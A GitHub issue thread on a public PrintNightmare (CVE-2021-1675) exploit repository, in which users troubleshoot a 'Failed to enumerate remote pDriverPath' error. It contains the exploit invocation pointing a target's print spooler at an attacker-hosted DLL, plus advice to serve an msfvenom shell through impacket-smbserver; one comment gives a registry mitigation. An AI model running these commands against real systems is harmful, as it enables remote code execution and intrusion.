cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
1.83k stars 581 forks source link

Failed to enumerate remote pDriverPath #59

Open oflavioc opened 3 years ago

oflavioc commented 3 years ago

Facing the error below:

┌──(kali㉿kali)-[~/CVE-2021-1675] └─$ python3 CVE-2021-1675.py server.local/user:password@192.168.10.116 '\192.168.10.215\print.dll' 1 ⨯ [*] Connecting to ncacn_np:192.168.10.116[\PIPE\spoolss] [+] Bind OK [-] Failed to enumerate remote pDriverPath RPRN SessionError: unknown error code: 0x8001011b

Does that mean the server is not vulnerable?

bitbull06 commented 2 years ago

Encountering exactly the same issue (testing from Kali to W10 client). Any thoughts? P.S. remote access to print spooler can be blocked easily by setting REG_DWORD RegisterSpoolerRemoteRpcEndpoint to 2 under hive HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers

cyber-Techy commented 1 year ago

I was able to solved this problem by moving the shell generated by msfvenom to /home/kali/Desktop.

Then i configure the smbserver with the directory, as seen below

impacket-smbserver share /home/kali/Desktop -smb2support

I hope this work for you too

XGokuX commented 7 months ago

I was able to solved this problem by moving the shell generated by msfvenom to /home/kali/Desktop.

Then i configure the smbserver with the directory, as seen below

impacket-smbserver share /home/kali/Desktop -smb2support

I hope this work for you too

i tried your solution but it seems not working for me. any other ideas !

TheFlu007 commented 6 months ago

Yes, I meet this issue too. But when I ask professional pentest he said that it had been patched

z3ena commented 6 months ago

Yes, I meet this issue too. But when I ask professional pentest he said that it had been patched

hi so if its patched would i not be able to run the exploit at all???